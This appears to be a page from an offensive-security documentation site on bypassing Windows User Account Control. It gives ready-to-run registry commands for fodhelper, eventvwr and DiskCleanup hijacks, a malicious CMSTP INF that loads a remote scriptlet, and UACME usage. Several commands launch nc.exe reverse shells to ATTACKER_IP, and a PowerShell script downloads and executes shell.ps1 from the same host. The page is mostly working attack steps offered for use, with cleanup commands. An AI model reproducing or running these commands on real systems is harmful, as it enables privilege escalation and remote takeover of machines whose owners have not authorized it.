Documentation Index
Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
Use this file to discover all available pages before exploring further.
Overview
UAC (User Account Control) prompts for elevation. If the user is in the local Administrators group but running in a medium-integrity context, UAC bypass escalates to high integrity without the prompt.
Check UAC Status
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
| ConsentPromptBehaviorAdmin | Meaning |
|---|
0 | No prompt (UAC disabled) |
1 | Prompt on secure desktop |
2 | Prompt for consent |
5 | Default — prompt for non-Windows binaries |
Check Current Integrity Level
whoami /groups | findstr "Label"
| Label | Level |
|---|
Medium Mandatory Level | Standard — UAC bypass needed |
High Mandatory Level | Already elevated |
fodhelper.exe
Auto-elevates. Reads a registry key we can control.
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
fodhelper.exe
reg delete HKCU\Software\Classes\ms-settings\Shell\Open\command /f
eventvwr.exe
Similar to fodhelper — abuses mmc.exe auto-elevation.
reg add HKCU\Software\Classes\mscfile\Shell\Open\command /d "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" /f
eventvwr.exe
reg delete HKCU\Software\Classes\mscfile\Shell\Open\command /f
CMSTP.exe
Connection Manager Profile Installer. Loads INF file that executes commands.
Create Malicious INF
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://ATTACKER_IP/payload.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Bypass"
ShortSvcName="Bypass"
Execute
cmstp.exe /ni /s malicious.inf
DiskCleanup (schtasks)
Environment variable windir hijack.
set windir=C:\Windows\Temp & schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
C:\Windows\Temp\System32\cleanmgr.exe
UACME — Automated Bypass
Collection of 70+ UAC bypass methods.
https://github.com/hfiref0x/UACME
Usage
Akagi64.exe <method_number> "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
| # | Technique | Works on |
|---|
| 23 | pkgmgr | Windows 10 |
| 33 | fodhelper | Windows 10/11 |
| 34 | DiskCleanup | Windows 10 |
| 41 | CMSTP | Windows 10 |
| 61 | sspi datagram | Windows 10/11 |
PowerShell Script (fodhelper)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')" -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
UAC bypass only works if user is already in Administrators group. It escalates from medium to high integrity, not from standard user to admin.